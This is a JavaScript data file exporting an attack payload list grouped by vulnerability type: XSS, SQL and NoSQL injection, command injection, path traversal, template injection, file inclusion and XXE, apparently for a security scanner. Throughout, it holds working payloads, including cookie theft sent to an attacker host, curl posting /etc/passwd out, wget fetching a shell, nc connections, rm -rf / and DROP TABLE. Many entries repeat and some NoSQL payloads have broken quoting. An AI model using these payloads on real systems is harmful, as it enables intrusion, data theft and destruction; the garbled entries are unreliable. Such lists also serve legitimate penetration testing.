export const payloadsData = [
    {
        vulnerabilityType: "XSS",
        language: "html",
        payloads: [
            "<svg/onload=alert('XSS')>",
            "<script>alert(String.fromCharCode(88,83,83))</script>",
            "<iframe src=\"javascript:alert('XSS')\"></iframe>",
            "<img src=x onerror=alert('XSS')>",
            "<script>alert(String.fromCharCode(88,83,83))</script>",
            "<img src=\"javascript:alert('XSS')\">",
            "<svg/onload=alert('XSS')>",
            "<a href=\"javascript:alert('XSS')\">XSS</a>",
            "<script>alert('XSS')</script>",
            '<img src="x" onerror="alert(\'XSS\');">',
            '<img src="https://example.com/x.png" onerror="alert(\'XSS\');">',
            "<script>alert(document.cookie)</script>",
            "<body onload=alert('XSS')>",
            "<svg><script>alert('XSS')</script></svg>",
            '<input type="text" value=""><img src="javascript:alert(\'XSS\')">',
            "<svg/onload=alert('XSS')>",
            "<video poster=javascript:alert('XSS')></video>",
            "<marquee onstart=alert('XSS')></marquee>",
            "<details/open/ontoggle=\"alert('XSS')\"></details>",
            "<isindex formaction=javascript:alert('XSS')>",
            "<plaintext><script>alert('XSS')</script></plaintext>",
            "<x/onpointerover=alert('XSS')>",
            "<base href=\"javascript:alert('XSS')//\">",
            "<object data=\"javascript:alert('XSS')\"></object>",
            '<svg><script/xlink:href="#"></script></svg>',
            "<a href=javascript:window.opener.location='https://example.com'>click</a>",
            "<img src=x:alert('XSS');>",
            "<a href=\"javascript:confirm('XSS')\">XSS</a>",
            "<iframe srcdoc=\"<script>alert('XSS')</script>\"></iframe>",
            "<img src=\"x' onerror='alert(1);\">",
            "<a href=\"data:text/html,<script>alert('XSS')</script>\">XSS</a>",
            "<img src=x onerror=prompt(1);>",
            "<script>alert(/XSS/)</script>",
            "<img src=x:alert('XSS')>",
            "<script>alert(/XSS/)</script>",
            "<style>@import'http://evil.com/xss.css';</style>",
            "<img src=\"x'\" onerror='alert(1)'>",
            "<svg onload=alert(1)>",
            "<svg onload=confirm(1)>",
            '<iframe src="javascript:alert(1)">',
            '<iframe srcdoc="<svg onload=alert(1)>">',
            "<svg onload=alert(1) onerror=alert(2)>",
            "<body onload=alert(1) onpageshow=alert(2)>",
            "<form><button formaction=javascript:alert(1)>X</button></form>",
            '<svg><animate xlink:href="#" attributeName=href values=javascript:alert(1)></svg>',
            "<svg/onload=\"document.write('<iframe src=http://attacker/?cookie='+document.cookie+'>')\">",
            "<svg onload=\"document.write('<img src=http://attacker/?cookie='+document.cookie+'>')\">",
            "<svg/onload=\"document.write('<script src=http://attacker/xss.js></script>')\">",
            "<svg/onload=\"fetch('http://attacker/?cookie='+document.cookie)\">",
            "<img src=\"x'\" onerror='alert(1)'>",
            "<svg onload=alert(1)>",
            "<svg onload=confirm(1)>",
            '<iframe src="javascript:alert(1)">',
            '<iframe srcdoc="<svg onload=alert(1)>">',
            "<svg onload=alert(1) onerror=alert(2)>",
            "<body onload=alert(1) onpageshow=alert(2)>",
            "<form><button formaction=javascript:alert(1)>X</button></form>",
            '<svg><animate xlink:href="#" attributeName=href values=javascript:alert(1)></svg>',
            "<svg/onload=\"document.write('<iframe src=http://attacker/?cookie='+document.cookie+'>')\">",
            "<svg onload=\"document.write('<img src=http://attacker/?cookie='+document.cookie+'>')\">",
            "<svg/onload=\"document.write('<script src=http://attacker/xss.js></script>')\">",
            "<svg/onload=\"fetch('http://attacker/?cookie='+document.cookie)\">",
        ],
    },
    {
        vulnerabilityType: "SQL Injection",
        language: "sql",
        payloads: [
            "' OR 1=1 --",
            "1'; DROP TABLE users; --",
            "' UNION SELECT * FROM users; --",
            "1 OR 1=1; DROP TABLE users; --",
            "1; DROP TABLE users; --",
            "' OR '1'='1",
            "'; EXEC sp_MSForEachTable 'DROP TABLE ?'",
            "'; EXEC xp_cmdshell 'cmd.exe'",
            "'; CREATE LOGIN admin WITH PASSWORD='admin'; --",
            "'; CREATE USER admin WITH PASSWORD='admin'; --",
            "' OR 1=1 /*",
            "' OR 1=1 %23",
            "' OR 'x'='x",
            "'; IF EXISTS(SELECT * FROM users WHERE username='admin') WAITFOR DELAY '0:0:5'; --",
            "'; IF EXISTS(SELECT * FROM users WHERE username='admin') DBCC TRACEON(3604) WAITFOR DELAY '0:0:5'; --",
            "' AND SLEEP(5) --",
            "' AND SLEEP(5) %23",
            "'; IF EXISTS(SELECT * FROM users WHERE username='admin') WAITFOR DELAY '0:0:5'; --",
            "'; IF EXISTS(SELECT * FROM users WHERE username='admin') DBCC TRACEON(3604) WAITFOR DELAY '0:0:5'; --",
            "' AND SLEEP(5) --",
            "' AND SLEEP(5) %23",
            "'; SELECT * FROM information_schema.tables WHERE table_name = 'users'; --",
            "'; SELECT * FROM information_schema.tables WHERE table_name = 'users' --",
            "'; SELECT * FROM information_schema.tables WHERE table_name = 'users' %23",
            "'; SELECT * FROM users WHERE username = 'admin'; --",
            "'; SELECT * FROM users WHERE username = 'admin' --",
            "'; SELECT * FROM users WHERE username = 'admin' %23",
            "' UNION ALL SELECT * FROM information_schema.tables; --",
            "' UNION ALL SELECT * FROM information_schema.tables --",
            "' UNION ALL SELECT * FROM information_schema.tables %23",
            "' UNION ALL SELECT * FROM users; --",
            "' UNION ALL SELECT * FROM users --",
            "' UNION ALL SELECT * FROM users %23",
            "1'; EXEC xp_cmdshell 'ping attacker.com'; --",
            "' OR 1=convert(int, (select @@version)); --",
            "' OR 1=1 /*",
            "' OR 1=1 %23",
            "' OR 'x'='x",
            "' OR 'x'='x' --",
            "' OR 'x'='x' %23",
            "' OR 'x'='x' /*",
            "' OR 'x'='x' %2f*",
            "' OR 'x'='x' %2f*%2f",
            "1; WAITFOR DELAY '0:0:5'; --",
            "1; WAITFOR DELAY '0:0:5' --",
            "1; WAITFOR DELAY '0:0:5' %23",
            "'; WAITFOR DELAY '0:0:5'; --",
            "'; WAITFOR DELAY '0:0:5' --",
            "'; WAITFOR DELAY '0:0:5' %23",
        ],
    },
    {
        vulnerabilityType: "NoSQL Injection",
        language: "json",
        payloads: [
            "{ username: { $gt: '' }, password: { $gt: '' } }",
            "{ $ne: 1 }",
            "{ $where: 'sleep(5000)' }",
            "{ $gt: '' }",
            "{ $gt: '', $comment: 'MongoDB NoSQL Injection' }",
            "{ $ne: 1, $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: /./, $options: 'i', $comment: 'MongoDB NoSQL Injection' }",
            "{ $where: 'function() { return true; }', $comment: 'MongoDB NoSQL Injection' }",
            "{ $gte: '', $lt: '', $comment: 'MongoDB NoSQL Injection' }",
            "{ $or: [ { $gt: '' }, { $lt: '' } ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $or: [ { $gt: '' }, { $eq: '' } ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $and: [ { $gt: '' }, { $lt: '' } ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $nin: [ null, undefined ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $nor: [ { $exists: false }, { $type: 'null' } ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $size: 1, $comment: 'MongoDB NoSQL Injection' }",
            "{ $type: 'number', $comment: 'MongoDB NoSQL Injection' }",
            "{ $bitsAllSet: [ 1, 2 ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $bitsAnySet: [ 1, 2 ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $bitsAllClear: [ 1, 2 ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $bitsAnyClear: [ 1, 2 ], $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: '.*', $options: 'i', $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: '.*', $options: 'm', $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: '.*', $options: 's', $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: '.*', $options: 'si', $comment: 'MongoDB NoSQL Injection' }",
            "{ $regex: '.*', $options: 'imsx', $comment: 'MongoDB NoSQL Injection' }",
            "{ $where: 'this.constructor.constructor('return process')().mainModule.require('child_process').exec('ls -la', function(error, stdout, stderr) { console.log(stdout) }); return this', $comment: 'MongoDB NoSQL Injection' }",
            "{ $where: 'this.constructor.constructor('return process')().mainModule.require('child_process').exec('ping attacker.com', function(error, stdout, stderr) { console.log(stdout) }); return this', $comment: 'MongoDB NoSQL Injection' }",
            "{ $gt: 'a' }",
            "{ $gt: 'aa' }",
            "{ $gt: 'aaa' }",
            "{ $gt: 'aaaa' }",
            "{ $gt: 'aaaaa' }",
            "{ $gt: 'aaaaaa' }",
            "{ $gt: 'aaaaaaa' }",
            "{ $gt: 'aaaaaaaa' }",
            "{ $gt: 'aaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
            "{ $gt: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' }",
        ],
    },
    {
        vulnerabilityType: "Command Injection",
        language: "bash",
        payloads: [
            "; ping -c 4 example.com",
            "| nc attacker.com 1234",
            "$(wget -O /tmp/shell http://attacker.com/shell.txt)",
            "`rm -rf /`",
            "; rm -rf /*",
            "| rm -rf /*",
            "$(rm -rf /*)",
            "; curl -X POST -d @/etc/passwd http://attacker.com",
            "| curl -X POST -d @/etc/passwd http://attacker.com",
            "$(curl -X POST -d @/etc/passwd http://attacker.com)",
            "`echo 'exploited' > /tmp/exploit.txt`",
            "; echo 'exploited' > /tmp/exploit.txt",
            "| echo 'exploited' > /tmp/exploit.txt",
            "$(echo 'exploited' > /tmp/exploit.txt)",
            "; wget http://attacker.com/shell.txt -O /tmp/shell.txt",
            "| wget http://attacker.com/shell.txt -O /tmp/shell.txt",
            "$(wget http://attacker.com/shell.txt -O /tmp/shell.txt)",
            "; curl http://attacker.com/shell.txt -o /tmp/shell.txt",
            "| curl http://attacker.com/shell.txt -o /tmp/shell.txt",
            "$(curl http://attacker.com/shell.txt -o /tmp/shell.txt)",
            "`cat /etc/passwd`",
            "; cat /etc/passwd",
            "| cat /etc/passwd",
            "$(cat /etc/passwd)",
            "; cp /etc/passwd /tmp/passwd_copy",
            "| cp /etc/passwd /tmp/passwd_copy",
            "$(cp /etc/passwd /tmp/passwd_copy)",
            "`ls -la /var/www/html`",
            "; ls -la /var/www/html",
            "| ls -la /var/www/html",
            "$(ls -la /var/www/html)",
            "; echo 'Hello, World!'",
            "| echo 'Hello, World!'",
            "$(echo 'Hello, World!')",
            "`whoami`",
            "; whoami",
            "| whoami",
            "$(whoami)",
            "; id",
            "| id",
            "$(id)",
            "; uname -a",
            "| uname -a",
            "$(uname -a)",
            "; ifconfig",
            "| ifconfig",
            "$(ifconfig)",
            "; netstat -an",
            "| netstat -an",
            "$(netstat -an)",
            "; ps aux",
            "| ps aux",
            "$(ps aux)",
            "; ls",
            "; cat /etc/passwd",
            "| ls",
            "| cat /etc/passwd",
            "$(ls)",
            "$(cat /etc/passwd)",
            "`ls`",
            "`cat /etc/passwd`",
            ";ls",
            ";cat /etc/passwd",
            "|ls",
            "|cat /etc/passwd",
            "&& ls",
            "&& cat /etc/passwd",
            "| ls",
            "| cat /etc/passwd",
            "|| ls",
            "|| cat /etc/passwd",
            ";& ls",
            ";& cat /etc/passwd",
            "| ls",
            "| cat /etc/passwd",
            "& ls",
            "& cat /etc/passwd",
            "; ls #",
            "; cat /etc/passwd #",
            "| ls #",
            "| cat /etc/passwd #",
            "&& ls #",
            "&& cat /etc/passwd #",
            "| ls #",
            "| cat /etc/passwd #",
            "|| ls #",
            "|| cat /etc/passwd #",
            ";& ls #",
            ";& cat /etc/passwd #",
            "| ls #",
            "| cat /etc/passwd #",
            "& ls #",
            "& cat /etc/passwd #",
            "; $(ls)",
            "; $(cat /etc/passwd)",
            "| $(ls)",
            "| $(cat /etc/passwd)",
            "&& $(ls)",
            "&& $(cat /etc/passwd)",
        ],
    },
    {
        vulnerabilityType: "Path Traversal",
        language: "bash",
        payloads: [
            "../etc/passwd",
            "../../etc/passwd",
            "../../../../etc/passwd",
            "../../../../../../../../../../etc/passwd",
            "../../../../../windows/win.ini",
            "../../../windows/win.ini",
            "../../../../../../../windows/win.ini",
            "../../../../../../../../../../windows/win.ini",
            "../boot.ini",
            "../../boot.ini",
            "../../../../../../boot.ini",
            "../../../../../../../../../../boot.ini",
            "../%00",
            "..%00/",
            "..%00/./",
            "..%00/../",
            "..%00/..%00/",
            "..%00/..%00../",
            "../%2e%2e%2f",
            "../%2e%2e%2fetc/passwd",
            "..%2fetc/passwd",
            "..%2fetc%2fpasswd",
            "..%2f../etc/passwd",
            "..%2f../etc%2fpasswd",
            "..%2f../../etc/passwd",
            "..%2f../../etc%2fpasswd",
            "..%2f../../../etc/passwd",
            "..%2f../../../etc%2fpasswd",
            "..%2f../../../../etc/passwd",
            "..%2f../../../../etc%2fpasswd",
            "..%5c",
            "..%5cetc/passwd",
            "..%5c../etc/passwd",
            "..%5c../etc%5cpasswd",
            "..%5c..%5c..%5c..%5cetc%5cpasswd",
            "..%2f..%5c..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2fetc/passwd",
            "..\\",
            "..\\etc\\passwd",
            "..\\..\\etc\\passwd",
            "..\\..\\..\\etc\\passwd",
            "..\\..\\..\\..\\..\\..\\etc\\passwd",
            "..\\boot.ini",
            "..\\..\\boot.ini",
            "..\\..\\..\\boot.ini",
            "..\\..\\..\\..\\..\\..\\boot.ini",
            "..%255c",
            "..%255cetc%255cpasswd",
            "..%c0%af",
            "..%c1%9c",
        ],
    },
    {
        vulnerabilityType: "Server-Side Template Injection (SSTI)",
        language: "jinja2",
        payloads: [
            // "${7*7}",
            "{{7*7}}",
            "{{7*'7'}}",
            "{{7*8}}",
            "{{config}}",
            "{{self}}",
            "{{request}}",
            "{{request.json}}",
            "{{config.__class__}}",
            "{{self.__class__}}",
            "{{request.__class__}}",
            "{{request.json.__class__}}",
            "{{7*'7'|join}}",
            "{{7*'7'|join()}}",
            "{{7*'7'|join(0)}}",
            "{{config.__class__}}",
            "{{self.__class__}}",
            "{{request.__class__}}",
            "{{request.json.__class__}}",
            "{{config.items()}}",
            "{{self.items()}}",
            "{{request.items()}}",
            "{{request.json.items()}}",
            "{{config.values()}}",
            "{{self.values()}}",
            "{{request.values()}}",
            "{{request.json.values()}}",
            "{{config.keys()}}",
            "{{self.keys()}}",
            "{{request.keys()}}",
            "{{request.json.keys()}}",
            "{{config.__class__.__mro__}}",
            "{{self.__class__.__mro__}}",
            "{{request.__class__.__mro__}}",
            "{{request.json.__class__.__mro__}}",
            "{{config.__init__.__globals__}}",
            "{{self.__init__.__globals__}}",
            "{{request.__init__.__globals__}}",
            "{{request.json.__init__.__globals__}}",
            "{{request.url_for.__globals__}}",
            "{{config.to_dict.__globals__}}",
            "{{self.to_dict.__globals__}}",
            "{{request.to_dict.__globals__}}",
            "{{request.json.to_dict.__globals__}}",
            "{{config.from_json.__globals__}}",
            "{{self.from_json.__globals__}}",
            "{{request.from_json.__globals__}}",
            "{{request.json.from_json.__globals__}}",
        ],
    },
    {
        vulnerabilityType: "File Inclusion",
        language: "bash",
        payloads: [
            "../../../../../../../../../../etc/passwd",
            "../../../../../../../../../../etc/shadow",
            "../../../../../../../../../../etc/hosts",
            "../../../../../../../../../../etc/hostname",
            "../../../../../../../../../../etc/resolv.conf",
            "../../../../../../../../../../etc/issue",
            "../../../../../../../../../../proc/version",
            "../../../../../../../../../../proc/self/cmdline",
            "../../../../../../../../../../proc/self/environ",
            "../../../../../../../../../../proc/self/status",
            "../../../../../../../../../../var/log/auth.log",
            "../../../../../../../../../../var/log/messages",
            "../../../../../../../../../../var/log/syslog",
            "../../../../../../../../../../var/log/apache2/access.log",
            "../../../../../../../../../../var/log/apache2/error.log",
            "../../../../../../../../../../var/log/nginx/access.log",
            "../../../../../../../../../../var/log/nginx/error.log",
            "../../../../../../../../../../var/log/mysql/error.log",
            "../../../../../../../../../../var/log/cron",
            "../../../../../../../../../../var/www/html/index.php",
            "../../../../../../../../../../var/www/html/config.php",
            "../../../../../../../../../../var/www/html/.htaccess",
            "../../../../../../../../../../var/www/html/wp-config.php",
            "../../../../../../../../../../var/www/html/admin/config.php",
            "../../../../../../../../../../var/www/html/inc/config.php",
            "../../../../../../../../../../var/www/html/includes/config.php",
            "../../../../../../../../../../var/www/html/application/config/config.php",
            "../../../../../../../../../../usr/local/apache/conf/httpd.conf",
            "../../../../../../../../../../usr/local/apache2/conf/httpd.conf",
            "../../../../../../../../../../usr/local/etc/apache2/httpd.conf",
            "../../../../../../../../../../usr/local/nginx/conf/nginx.conf",
            "../../../../../../../../../../usr/local/etc/nginx/nginx.conf",
            "../../../../../../../../../../usr/local/mysql/my.cnf",
            "../../../../../../../../../../usr/local/etc/mysql/my.cnf",
            "../../../../../../../../../../etc/httpd/conf/httpd.conf",
            "../../../../../../../../../../etc/nginx/nginx.conf",
            "../../../../../../../../../../etc/mysql/my.cnf",
            "../../../../../../../../../../etc/php.ini",
            "../../../../../../../../../../etc/ssh/sshd_config",
            "../../../../../../../../../../etc/samba/smb.conf",
            "../../../../../../../../../../etc/pam.d/su",
            "../../../../../../../../../../etc/pam.d/common-auth",
            "../../../../../../../../../../etc/fstab",
            "../../../../../../../../../../etc/crontab",
            "../../../../../../../../../../etc/exports",
            "../../../../../../../../../../etc/issue",
            "../../../../../../../../../../etc/profile",
            "../../../../../../../../../../etc/rc.local",
            "../../../../../../../../../../etc/security/limits.conf",
        ],
    },
    {
        vulnerabilityType: "XML External Entity (XXE) Injection",
        language: "xml",
        payloads: [
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/resolv.conf">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/issue">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://evil.com/xxe_payload.dtd">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/shadow"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/hosts"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/hostname"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/resolv.conf"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "file:///etc/issue"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://evil.com/xxe_payload.dtd"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> %xxe;]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe "&xxe;" >]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe "<entity>&xxe;</entity>" >]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe "<!ENTITY &xxe; \'xxe_payload\'>" >]><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/resolv.conf">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/issue">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://evil.com/xxe_payload.dtd">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root PUBLIC "-//OASIS//DTD DITA Topic//EN" "http://evil.com/xxe_payload.dtd"><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root PUBLIC "-//OASIS//DTD DITA Topic//EN" "http://evil.com/xxe_payload.dtd"><root><name>test</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root PUBLIC "-//OASIS//DTD DITA Topic//EN" "http://evil.com/xxe_payload.dtd"><root></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root PUBLIC "-//OASIS//DTD DITA Topic//EN" "http://evil.com/xxe_payload.dtd"><root><name>&xxe;</name></root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/resolv.conf">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/issue">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://evil.com/xxe_payload.dtd">]><root>&xxe;</root>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]><root>&xxe;</root>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/resolv.conf">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/issue">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/xxe_payload.dtd">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]><foo>&xxe;</foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/shadow"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/hosts"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/hostname"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/resolv.conf"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/issue"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe_payload.dtd"> %xxe;]><foo></foo>',
            '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> %xxe;]><foo></foo>',
        ],
    },
];
